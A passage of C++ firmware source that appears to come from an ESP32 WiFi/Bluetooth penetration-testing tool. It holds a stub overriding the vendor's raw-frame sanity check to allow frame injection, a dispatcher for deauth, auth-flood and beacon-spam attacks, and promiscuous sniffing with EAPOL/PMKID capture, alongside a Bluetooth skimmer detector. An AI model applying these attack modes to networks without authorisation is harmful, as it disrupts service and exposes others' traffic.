| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884885886887888889890891892893894895896897898899900901902903904905906907908909910911912913914915916917918919920921922923924925926927928929930931932933934935936937938939940941942943944945946947948949950951952953954955956957958959960961962963964965966967968969970971972973974975976977978979980981982983984985986987988989990991992993994995996997998999100010011002100310041005100610071008100910101011101210131014101510161017101810191020102110221023102410251026102710281029103010311032103310341035103610371038103910401041104210431044104510461047104810491050105110521053105410551056105710581059106010611062106310641065106610671068106910701071107210731074107510761077107810791080108110821083108410851086108710881089109010911092109310941095109610971098109911001101110211031104110511061107110811091110111111121113111411151116111711181119112011211122112311241125112611271128112911301131113211331134113511361137113811391140114111421143114411451146114711481149115011511152115311541155115611571158115911601161116211631164116511661167116811691170117111721173117411751176117711781179118011811182118311841185118611871188118911901191119211931194119511961197119811991200120112021203120412051206120712081209121012111212121312141215121612171218121912201221122212231224122512261227122812291230123112321233123412351236123712381239124012411242124312441245124612471248124912501251125212531254125512561257125812591260126112621263126412651266126712681269127012711272127312741275127612771278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389139013911392139313941395139613971398139914001401140214031404140514061407140814091410141114121413141414151416141714181419142014211422142314241425142614271428142914301431143214331434143514361437143814391440144114421443144414451446144714481449145014511452145314541455145614571458145914601461146214631464146514661467146814691470147114721473147414751476147714781479148014811482148314841485148614871488148914901491149214931494149514961497149814991500150115021503150415051506150715081509151015111512151315141515151615171518151915201521152215231524152515261527152815291530153115321533153415351536153715381539154015411542154315441545154615471548154915501551155215531554155515561557155815591560156115621563156415651566156715681569157015711572157315741575157615771578157915801581158215831584158515861587158815891590159115921593159415951596159715981599160016011602160316041605160616071608160916101611161216131614161516161617161816191620162116221623162416251626162716281629163016311632163316341635163616371638163916401641164216431644164516461647164816491650165116521653165416551656165716581659166016611662166316641665166616671668166916701671167216731674167516761677167816791680168116821683168416851686168716881689169016911692169316941695169616971698169917001701170217031704170517061707170817091710171117121713171417151716171717181719172017211722172317241725172617271728172917301731173217331734173517361737173817391740174117421743174417451746174717481749175017511752175317541755175617571758175917601761176217631764176517661767176817691770177117721773177417751776177717781779178017811782178317841785178617871788178917901791179217931794179517961797179817991800180118021803180418051806180718081809181018111812181318141815181618171818181918201821182218231824182518261827182818291830183118321833183418351836183718381839184018411842184318441845184618471848184918501851185218531854185518561857185818591860186118621863186418651866186718681869187018711872187318741875187618771878187918801881188218831884188518861887188818891890189118921893189418951896189718981899190019011902190319041905190619071908190919101911191219131914191519161917191819191920192119221923192419251926192719281929193019311932193319341935193619371938193919401941194219431944194519461947194819491950195119521953195419551956195719581959196019611962196319641965196619671968196919701971197219731974197519761977197819791980198119821983198419851986198719881989199019911992199319941995199619971998199920002001200220032004200520062007200820092010201120122013201420152016201720182019202020212022202320242025202620272028202920302031203220332034203520362037203820392040204120422043204420452046204720482049205020512052205320542055205620572058205920602061206220632064206520662067206820692070207120722073207420752076207720782079208020812082208320842085208620872088208920902091209220932094209520962097209820992100210121022103210421052106210721082109211021112112211321142115211621172118211921202121212221232124212521262127212821292130213121322133213421352136213721382139214021412142214321442145214621472148214921502151215221532154215521562157215821592160216121622163216421652166216721682169217021712172217321742175217621772178217921802181218221832184218521862187218821892190219121922193219421952196219721982199220022012202220322042205220622072208220922102211221222132214221522162217221822192220222122222223222422252226222722282229223022312232223322342235223622372238223922402241224222432244224522462247224822492250225122522253225422552256225722582259226022612262226322642265226622672268226922702271227222732274227522762277227822792280228122822283228422852286228722882289229022912292229322942295229622972298229923002301230223032304230523062307230823092310231123122313231423152316231723182319232023212322232323242325232623272328232923302331233223332334233523362337233823392340234123422343234423452346234723482349235023512352235323542355235623572358235923602361236223632364236523662367236823692370237123722373237423752376237723782379238023812382238323842385238623872388238923902391239223932394239523962397239823992400240124022403240424052406240724082409241024112412241324142415241624172418241924202421242224232424242524262427242824292430243124322433243424352436243724382439244024412442244324442445244624472448244924502451245224532454245524562457245824592460246124622463246424652466246724682469247024712472247324742475247624772478247924802481248224832484248524862487248824892490249124922493249424952496249724982499250025012502250325042505250625072508250925102511251225132514251525162517251825192520252125222523252425252526252725282529253025312532253325342535253625372538253925402541254225432544254525462547254825492550255125522553255425552556255725582559256025612562256325642565256625672568256925702571257225732574257525762577257825792580258125822583258425852586258725882589259025912592259325942595259625972598259926002601260226032604260526062607260826092610261126122613261426152616261726182619262026212622262326242625262626272628262926302631263226332634263526362637263826392640264126422643264426452646264726482649265026512652265326542655265626572658265926602661266226632664266526662667266826692670267126722673267426752676267726782679268026812682268326842685268626872688268926902691269226932694269526962697269826992700270127022703270427052706270727082709271027112712271327142715271627172718271927202721272227232724272527262727272827292730273127322733273427352736273727382739274027412742274327442745274627472748274927502751275227532754275527562757275827592760276127622763276427652766276727682769277027712772277327742775277627772778277927802781278227832784278527862787278827892790279127922793279427952796279727982799280028012802280328042805280628072808280928102811281228132814281528162817281828192820282128222823282428252826282728282829283028312832283328342835283628372838283928402841284228432844284528462847284828492850285128522853285428552856285728582859286028612862286328642865286628672868286928702871287228732874287528762877287828792880288128822883288428852886288728882889289028912892289328942895289628972898289929002901290229032904290529062907290829092910291129122913291429152916291729182919292029212922292329242925292629272928292929302931293229332934293529362937293829392940294129422943294429452946294729482949295029512952295329542955295629572958295929602961296229632964296529662967296829692970297129722973297429752976297729782979298029812982298329842985298629872988298929902991299229932994299529962997299829993000300130023003300430053006300730083009301030113012301330143015301630173018301930203021302230233024302530263027302830293030303130323033303430353036303730383039304030413042304330443045304630473048304930503051305230533054305530563057305830593060306130623063306430653066306730683069307030713072307330743075307630773078307930803081308230833084308530863087308830893090309130923093309430953096309730983099310031013102310331043105310631073108310931103111311231133114311531163117311831193120312131223123312431253126312731283129313031313132313331343135313631373138313931403141314231433144314531463147314831493150315131523153315431553156315731583159316031613162316331643165316631673168316931703171317231733174317531763177317831793180318131823183318431853186318731883189319031913192319331943195319631973198319932003201320232033204320532063207320832093210321132123213321432153216321732183219 |
- #include "WiFiScan.h"
- #include "lang_var.h"
- int num_beacon = 0;
- int num_deauth = 0;
- int num_probe = 0;
- int num_eapol = 0;
- LinkedList<ssid>* ssids;
- LinkedList<AccessPoint>* access_points;
- extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){
- if (arg == 31337)
- return 1;
- else
- return 0;
- }
- #ifdef HAS_BT
- class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks {
-
- void onResult(BLEAdvertisedDevice *advertisedDevice) {
-
- #ifdef HAS_SCREEN
- int buf = display_obj.display_buffer->size();
- #else
- int buf = 0;
- #endif
-
- String display_string = "";
- if (buf >= 0)
- {
- display_string.concat(text_table4[0]);
- display_string.concat(advertisedDevice->getRSSI());
- Serial.print(" RSSI: ");
- Serial.print(advertisedDevice->getRSSI());
-
- display_string.concat(" ");
- Serial.print(" ");
-
- Serial.print("Device: ");
- if(advertisedDevice->getName().length() != 0)
- {
- display_string.concat(advertisedDevice->getName().c_str());
- Serial.print(advertisedDevice->getName().c_str());
-
- }
- else
- {
- display_string.concat(advertisedDevice->getAddress().toString().c_str());
- Serial.print(advertisedDevice->getAddress().toString().c_str());
- }
-
- #ifdef HAS_SCREEN
- uint8_t temp_len = display_string.length();
- for (uint8_t i = 0; i < 40 - temp_len; i++)
- {
- display_string.concat(" ");
- }
-
- Serial.println();
-
- while (display_obj.printing)
- delay(1);
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- #endif
- }
- }
- };
-
- class bluetoothScanSkimmersCallback: public BLEAdvertisedDeviceCallbacks {
- void onResult(BLEAdvertisedDevice *advertisedDevice) {
- String bad_list[bad_list_length] = {"HC-03", "HC-05", "HC-06"};
-
- #ifdef HAS_SCREEN
- int buf = display_obj.display_buffer->size();
- #else
- int buf = 0;
- #endif
-
- if (buf >= 0)
- {
- Serial.print("Device: ");
- String display_string = "";
- if(advertisedDevice->getName().length() != 0)
- {
- Serial.print(advertisedDevice->getName().c_str());
- for(uint8_t i = 0; i < bad_list_length; i++)
- {
- #ifdef HAS_SCREEN
- if(strcmp(advertisedDevice->getName().c_str(), bad_list[i].c_str()) == 0)
- {
- display_string.concat(text_table4[1]);
- display_string.concat(" ");
- display_string.concat(advertisedDevice->getName().c_str());
- uint8_t temp_len = display_string.length();
- for (uint8_t i = 0; i < 40 - temp_len; i++)
- {
- display_string.concat(" ");
- }
- while (display_obj.printing)
- delay(1);
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- }
- #endif
- }
- }
- else
- {
- Serial.print(advertisedDevice->getAddress().toString().c_str());
- }
- Serial.print(" RSSI: ");
- Serial.println(advertisedDevice->getRSSI());
- }
- }
- };
- #endif
- WiFiScan::WiFiScan()
- {
- }
- void WiFiScan::RunSetup() {
- if (ieee80211_raw_frame_sanity_check(31337, 0, 0) == 1)
- this->wsl_bypass_enabled = true;
- else
- this->wsl_bypass_enabled = false;
-
- ssids = new LinkedList<ssid>();
- access_points = new LinkedList<AccessPoint>();
- #ifdef HAS_BT
- NimBLEDevice::setScanFilterMode(CONFIG_BTDM_SCAN_DUPL_TYPE_DEVICE);
- NimBLEDevice::setScanDuplicateCacheSize(200);
- NimBLEDevice::init("");
- pBLEScan = NimBLEDevice::getScan(); //create new scan
- this->ble_initialized = true;
-
- this->shutdownBLE();
- #endif
- this->initWiFi(1);
- }
- int WiFiScan::clearAPs() {
- int num_cleared = access_points->size();
- access_points->clear();
- Serial.println("access_points: " + (String)access_points->size());
- return num_cleared;
- }
- int WiFiScan::clearSSIDs() {
- int num_cleared = ssids->size();
- ssids->clear();
- Serial.println("ssids: " + (String)ssids->size());
- return num_cleared;
- }
- bool WiFiScan::addSSID(String essid) {
- ssid s = {essid, {random(256), random(256), random(256), random(256), random(256), random(256)}, false};
- ssids->add(s);
- Serial.println(ssids->get(ssids->size() - 1).essid);
- return true;
- }
- int WiFiScan::generateSSIDs(int count) {
- uint8_t num_gen = count;
- for (uint8_t x = 0; x < num_gen; x++) {
- String essid = "";
- for (uint8_t i = 0; i < 6; i++)
- essid.concat(alfa[random(65)]);
- ssid s = {essid, {random(256), random(256), random(256), random(256), random(256), random(256)}, false};
- ssids->add(s);
- Serial.println(ssids->get(ssids->size() - 1).essid);
- }
- return num_gen;
- }
- #ifdef HAS_SCREEN
- void WiFiScan::joinWiFi(String ssid, String password)
- {
- static const char * btns[] ={text16, ""};
- int count = 0;
-
- if ((WiFi.status() == WL_CONNECTED) && (ssid == connected_network) && (ssid != "")) {
- lv_obj_t * mbox1 = lv_msgbox_create(lv_scr_act(), NULL);
- lv_msgbox_set_text(mbox1, text_table4[2]);
- lv_msgbox_add_btns(mbox1, btns);
- lv_obj_set_width(mbox1, 200);
- lv_obj_align(mbox1, NULL, LV_ALIGN_CENTER, 0, 0); /*Align to the corner*/
- this->wifi_initialized = true;
- return;
- }
- else if (WiFi.status() == WL_CONNECTED) {
- Serial.println("Already connected. Disconnecting...");
- WiFi.disconnect();
- }
-
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_start();
-
- WiFi.begin(ssid.c_str(), password.c_str());
-
- Serial.print("Connecting to WiFi");
- while (WiFi.status() != WL_CONNECTED) {
- delay(500);
- Serial.print(".");
- count++;
- if (count == 10)
- {
- Serial.println("\nCould not connect to WiFi network");
- lv_obj_t * mbox1 = lv_msgbox_create(lv_scr_act(), NULL);
- lv_msgbox_set_text(mbox1, text_table4[3]);
- lv_msgbox_add_btns(mbox1, btns);
- lv_obj_set_width(mbox1, 200);
- //lv_obj_set_event_cb(mbox1, event_handler);
- lv_obj_align(mbox1, NULL, LV_ALIGN_CENTER, 0, 0); /*Align to the corner*/
- WiFi.mode(WIFI_OFF);
- return;
- }
- }
-
- lv_obj_t * mbox1 = lv_msgbox_create(lv_scr_act(), NULL);
- lv_msgbox_set_text(mbox1, text_table4[4]);
- lv_msgbox_add_btns(mbox1, btns);
- lv_obj_set_width(mbox1, 200);
- lv_obj_align(mbox1, NULL, LV_ALIGN_CENTER, 0, 0); /*Align to the corner*/
-
- connected_network = ssid;
-
- Serial.println("\nConnected to the WiFi network");
- Serial.print("IP address: ");
- Serial.println(WiFi.localIP());
- this->wifi_initialized = true;
- }
- #endif
- // Apply WiFi settings
- void WiFiScan::initWiFi(uint8_t scan_mode) {
- // Set the channel
- if (scan_mode != WIFI_SCAN_OFF) {
- //Serial.println(F("Initializing WiFi settings..."));
- this->changeChannel();
-
- this->force_pmkid = settings_obj.loadSetting<bool>(text_table4[5]);
- this->force_probe = settings_obj.loadSetting<bool>(text_table4[6]);
- this->save_pcap = settings_obj.loadSetting<bool>(text_table4[7]);
- //Serial.println(F("Initialization complete"));
- }
- }
- bool WiFiScan::scanning() {
- if (this->currentScanMode == WIFI_SCAN_OFF)
- return false;
- else
- return true;
- }
- // Function to prepare to run a specific scan
- void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
- {
- this->initWiFi(scan_mode);
- if (scan_mode == WIFI_SCAN_OFF)
- StopScan(scan_mode);
- else if (scan_mode == WIFI_SCAN_PROBE)
- RunProbeScan(scan_mode, color);
- else if (scan_mode == WIFI_SCAN_EAPOL)
- RunEapolScan(scan_mode, color);
- else if (scan_mode == WIFI_SCAN_ACTIVE_EAPOL)
- RunEapolScan(scan_mode, color);
- else if (scan_mode == WIFI_SCAN_AP)
- RunBeaconScan(scan_mode, color);
- else if (scan_mode == WIFI_SCAN_TARGET_AP)
- RunAPScan(scan_mode, color);
- else if (scan_mode == WIFI_SCAN_TARGET_AP_FULL)
- RunAPScan(scan_mode, color);
- else if (scan_mode == WIFI_SCAN_PWN)
- RunPwnScan(scan_mode, color);
- else if (scan_mode == WIFI_SCAN_DEAUTH)
- RunDeauthScan(scan_mode, color);
- else if (scan_mode == WIFI_PACKET_MONITOR) {
- #ifdef HAS_SCREEN
- RunPacketMonitor(scan_mode, color);
- #endif
- }
- else if (scan_mode == WIFI_ATTACK_BEACON_LIST)
- this->startWiFiAttacks(scan_mode, color, text_table1[50]);
- else if (scan_mode == WIFI_ATTACK_BEACON_SPAM)
- this->startWiFiAttacks(scan_mode, color, text_table1[51]);
- else if (scan_mode == WIFI_ATTACK_RICK_ROLL)
- this->startWiFiAttacks(scan_mode, color, text_table1[52]);
- else if (scan_mode == WIFI_ATTACK_AUTH)
- this->startWiFiAttacks(scan_mode, color, text_table4[7]);
- else if (scan_mode == WIFI_ATTACK_DEAUTH)
- this->startWiFiAttacks(scan_mode, color, text_table4[8]);
- else if (scan_mode == WIFI_ATTACK_AP_SPAM)
- this->startWiFiAttacks(scan_mode, color, " AP Beacon Spam ");
- else if (scan_mode == BT_SCAN_ALL) {
- #ifdef HAS_BT
- RunBluetoothScan(scan_mode, color);
- #endif
- }
- else if (scan_mode == BT_SCAN_SKIMMERS) {
- #ifdef HAS_BT
- RunBluetoothScan(scan_mode, color);
- #endif
- }
- else if (scan_mode == WIFI_SCAN_ESPRESSIF)
- RunEspressifScan(scan_mode, color);
- else if (scan_mode == LV_JOIN_WIFI) {
- #ifdef HAS_SCREEN
- RunLvJoinWiFi(scan_mode, color);
- #endif
- }
- else if (scan_mode == LV_ADD_SSID) {
- #ifdef HAS_SCREEN
- RunLvJoinWiFi(scan_mode, color);
- #endif
- }
- WiFiScan::currentScanMode = scan_mode;
- }
- void WiFiScan::startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string) {
- // Common wifi attack configurations
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.print_delay_1 = 15;
- display_obj.print_delay_2 = 10;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_BLACK, color);
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString((String)title_string,120,16,2);
- display_obj.touchToExit();
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- #endif
- packets_sent = 0;
- WiFi.mode(WIFI_AP_STA);
- //esp_wifi_init(&cfg);
- //esp_wifi_set_storage(WIFI_STORAGE_RAM);
- //esp_wifi_set_mode(WIFI_AP_STA);
- //esp_wifi_start();
- //esp_wifi_set_promiscuous_filter(NULL);
- esp_wifi_set_promiscuous(true);
- esp_wifi_set_max_tx_power(82);
- this->wifi_initialized = true;
- #ifdef MARAUDER_FLIPPER
- flipper_led.attackLED();
- #endif
- initTime = millis();
- }
- bool WiFiScan::shutdownWiFi() {
- if (this->wifi_initialized) {
- esp_wifi_set_promiscuous(false);
- WiFi.disconnect();
- WiFi.mode(WIFI_OFF);
-
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_stop();
- esp_wifi_deinit();
- #ifdef MARAUDER_FLIPPER
- flipper_led.offLED();
- #endif
-
- this->wifi_initialized = false;
- return true;
- }
- else {
- return false;
- }
- }
- bool WiFiScan::shutdownBLE() {
- #ifdef HAS_BT
- if (this->ble_initialized) {
- pBLEScan->stop();
-
- pBLEScan->clearResults();
- BLEDevice::deinit();
- #ifdef MARAUDER_FLIPPER
- flipper_led.offLED();
- #endif
-
- this->ble_initialized = false;
- return true;
- }
- else {
- return false;
- }
- #endif
- return true;
- }
- // Function to stop all wifi scans
- void WiFiScan::StopScan(uint8_t scan_mode)
- {
- if ((currentScanMode == WIFI_SCAN_PROBE) ||
- (currentScanMode == WIFI_SCAN_AP) ||
- (currentScanMode == WIFI_SCAN_TARGET_AP) ||
- (currentScanMode == WIFI_SCAN_TARGET_AP_FULL) ||
- (currentScanMode == WIFI_SCAN_PWN) ||
- (currentScanMode == WIFI_SCAN_ESPRESSIF) ||
- (currentScanMode == WIFI_SCAN_EAPOL) ||
- (currentScanMode == WIFI_SCAN_ACTIVE_EAPOL) ||
- (currentScanMode == WIFI_SCAN_ALL) ||
- (currentScanMode == WIFI_SCAN_DEAUTH) ||
- (currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
- (currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
- (currentScanMode == WIFI_ATTACK_AUTH) ||
- (currentScanMode == WIFI_ATTACK_DEAUTH) ||
- (currentScanMode == WIFI_ATTACK_MIMIC) ||
- (currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
- (currentScanMode == WIFI_PACKET_MONITOR) ||
- (currentScanMode == LV_JOIN_WIFI))
- {
- this->shutdownWiFi();
- }
-
- else if ((currentScanMode == BT_SCAN_ALL) ||
- (currentScanMode == BT_SCAN_SKIMMERS))
- {
- #ifdef HAS_BT
- this->shutdownBLE();
- #endif
- }
- #ifdef HAS_SCREEN
- display_obj.display_buffer->clear();
- #ifdef SCREEN_BUFFER
- display_obj.screen_buffer->clear();
- #endif
- //Serial.print("display_buffer->size(): ");
- Serial.println(display_obj.display_buffer->size());
-
- display_obj.tteBar = false;
- #endif
- }
- String WiFiScan::getStaMAC()
- {
- char *buf;
- uint8_t mac[6];
- char macAddrChr[18] = {0};
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_start();
- esp_err_t mac_status = esp_wifi_get_mac(WIFI_IF_AP, mac);
- this->wifi_initialized = true;
- sprintf(macAddrChr,
- "%02X:%02X:%02X:%02X:%02X:%02X",
- mac[0],
- mac[1],
- mac[2],
- mac[3],
- mac[4],
- mac[5]);
- this->shutdownWiFi();
- return String(macAddrChr);
- }
- String WiFiScan::getApMAC()
- {
- char *buf;
- uint8_t mac[6];
- char macAddrChr[18] = {0};
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_start();
- esp_err_t mac_status = esp_wifi_get_mac(WIFI_IF_AP, mac);
- this->wifi_initialized = true;
- sprintf(macAddrChr,
- "%02X:%02X:%02X:%02X:%02X:%02X",
- mac[0],
- mac[1],
- mac[2],
- mac[3],
- mac[4],
- mac[5]);
- this->shutdownWiFi();
- return String(macAddrChr);
- }
- String WiFiScan::freeRAM()
- {
- char s[150];
- sprintf(s, "RAM Free: %u bytes", esp_get_free_heap_size());
- this->free_ram = String(esp_get_free_heap_size());
- return String(s);
- }
- // Function to start running a beacon scan
- void WiFiScan::RunAPScan(uint8_t scan_mode, uint16_t color)
- {
- sd_obj.openCapture("ap");
- #ifdef MARAUDER_FLIPPER
- flipper_led.sniffLED();
- #endif
- Serial.println(text_table4[9] + (String)access_points->size());
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.print_delay_1 = 15;
- display_obj.print_delay_2 = 10;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_WHITE, color);
- #ifndef MARAUDER_MINI
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(text_table4[44],120,16,2);
- display_obj.touchToExit();
- #endif
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
- #endif
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_start();
- esp_wifi_set_promiscuous(true);
- esp_wifi_set_promiscuous_filter(&filt);
- //if (scan_mode == WIFI_SCAN_TARGET_AP_FULL)
- esp_wifi_set_promiscuous_rx_cb(&apSnifferCallbackFull);
- //else
- // esp_wifi_set_promiscuous_rx_cb(&apSnifferCallback);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- this->wifi_initialized = true;
- initTime = millis();
- }
- #ifdef HAS_SCREEN
- void WiFiScan::RunLvJoinWiFi(uint8_t scan_mode, uint16_t color) {
-
- display_obj.tft.init();
- display_obj.tft.setRotation(1);
-
- #ifdef TFT_SHIELD
- uint16_t calData[5] = { 391, 3491, 266, 3505, 7 }; // Landscape TFT Shield
- Serial.println("Using TFT Shield");
- #else if defined(TFT_DIY)
- uint16_t calData[5] = { 213, 3469, 320, 3446, 1 }; // Landscape TFT DIY
- Serial.println("Using TFT DIY");
- #endif
- display_obj.tft.setTouch(calData);
-
-
- lv_obj_t * scr = lv_cont_create(NULL, NULL);
- lv_disp_load_scr(scr);
-
- }
- #endif
- void WiFiScan::RunClearAPs() {
- #ifdef HAS_SCREEN
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setFreeFont(NULL);
- display_obj.tft.setCursor(0, 100);
- display_obj.tft.setTextSize(1);
- display_obj.tft.setTextColor(TFT_CYAN);
-
- display_obj.tft.println(F(text_table4[9]));
- display_obj.tft.println(text_table4[10] + (String)this->clearAPs());
- #else
- this->clearAPs();
- #endif
- }
- void WiFiScan::RunClearSSIDs() {
- #ifdef HAS_SCREEN
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setFreeFont(NULL);
- display_obj.tft.setCursor(0, 100);
- display_obj.tft.setTextSize(1);
- display_obj.tft.setTextColor(TFT_CYAN);
-
- display_obj.tft.println(F(text_table4[11]));
- display_obj.tft.println(text_table4[12] + (String)this->clearSSIDs());
- #else
- this->clearSSIDs();
- #endif
- }
- void WiFiScan::RunGenerateSSIDs(int count) {
- #ifdef HAS_SCREEN
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setFreeFont(NULL);
- display_obj.tft.setCursor(0, 100);
- display_obj.tft.setTextSize(1);
- display_obj.tft.setTextColor(TFT_CYAN);
-
- display_obj.tft.println(F(text_table4[13]));
-
- display_obj.tft.println(text_table4[14] + (String)this->generateSSIDs());
- display_obj.tft.println(text_table4[15] + (String)ssids->size());
- #else
- this->generateSSIDs(count);
- #endif
- }
- void WiFiScan::RunShutdownWiFi() {
- #ifdef HAS_SCREEN
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setFreeFont(NULL);
- display_obj.tft.setCursor(0, 100);
- display_obj.tft.setTextSize(1);
- display_obj.tft.setTextColor(TFT_CYAN);
- display_obj.tft.print(F(text_table4[16]));
- #endif
- if (this->wifi_initialized) {
- this->shutdownWiFi();
- #ifdef HAS_SCREEN
- display_obj.tft.setTextColor(TFT_GREEN);
- display_obj.tft.println(F("OK"));
- #endif
- }
- else {
- #ifdef HAS_SCREEN
- display_obj.tft.setTextColor(TFT_RED);
- display_obj.tft.println(F(text17));
- display_obj.tft.println(F(text_table4[17]));
- #endif
- }
- }
- void WiFiScan::RunShutdownBLE() {
- #ifdef HAS_SCREEN
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setFreeFont(NULL);
- display_obj.tft.setCursor(0, 100);
- display_obj.tft.setTextSize(1);
- display_obj.tft.setTextColor(TFT_CYAN);
-
- display_obj.tft.print(F(text_table4[18]));
- #endif
- if (this->ble_initialized) {
- this->shutdownBLE();
- #ifdef HAS_SCREEN
- display_obj.tft.setTextColor(TFT_GREEN);
- display_obj.tft.println(F("OK"));
- #endif
- }
- else {
- #ifdef HAS_SCREEN
- display_obj.tft.setTextColor(TFT_RED);
- display_obj.tft.println(F(text17));
- display_obj.tft.println(F(text_table4[19]));
- #endif
- }
- }
- void WiFiScan::RunInfo()
- {
- String sta_mac = this->getStaMAC();
- String ap_mac = this->getApMAC();
- String free_ram = this->freeRAM();
-
- //Serial.print("STA MAC: ");
- //Serial.println(sta_mac);
- //Serial.print("AP MAC: ");
- //Serial.println(ap_mac);
- Serial.println(free_ram);
- #ifdef HAS_SCREEN
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setFreeFont(NULL);
- display_obj.tft.setCursor(0, SCREEN_HEIGHT / 3);
- display_obj.tft.setTextSize(1);
- display_obj.tft.setTextColor(TFT_CYAN);
- display_obj.tft.println(text_table4[20]);
- display_obj.tft.println(text_table4[21] + display_obj.version_number);
- display_obj.tft.println(text_table4[22] + (String)esp_get_idf_version());
- #endif
- if (this->wsl_bypass_enabled) {
- #ifdef HAS_SCREEN
- display_obj.tft.println(text_table4[23]);
- #endif
- }
- else {
- #ifdef HAS_SCREEN
- display_obj.tft.println(text_table4[24]);
- #endif
- }
- #ifdef HAS_SCREEN
- display_obj.tft.println(text_table4[25] + sta_mac);
- display_obj.tft.println(text_table4[26] + ap_mac);
- display_obj.tft.println(text_table4[27] + free_ram);
- #endif
- if (sd_obj.supported) {
- #ifdef HAS_SCREEN
- display_obj.tft.println(text_table4[28]);
- display_obj.tft.print(text_table4[29]);
- display_obj.tft.print(sd_obj.card_sz);
- display_obj.tft.println("MB");
- #endif
- }
- else {
- #ifdef HAS_SCREEN
- display_obj.tft.println(text_table4[30]);
- display_obj.tft.println(text_table4[31]);
- #endif
- }
- battery_obj.battery_level = battery_obj.getBatteryLevel();
- if (battery_obj.i2c_supported) {
- #ifdef HAS_SCREEN
- display_obj.tft.println(text_table4[32]);
- display_obj.tft.println(text_table4[33] + (String)battery_obj.battery_level + "%");
- #endif
- }
- else {
- #ifdef HAS_SCREEN
- display_obj.tft.println(text_table4[34]);
- #endif
- }
- #ifdef HAS_SCREEN
- display_obj.tft.println(text_table4[35] + (String)temp_obj.current_temp + " C");
- #endif
- }
- void WiFiScan::RunEspressifScan(uint8_t scan_mode, uint16_t color) {
- sd_obj.openCapture("espressif");
- #ifdef MARAUDER_FLIPPER
- flipper_led.sniffLED();
- #endif
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.print_delay_1 = 15;
- display_obj.print_delay_2 = 10;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_WHITE, color);
- #ifndef MARAUDER_MINI
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(text_table4[36],120,16,2);
- display_obj.touchToExit();
- #endif
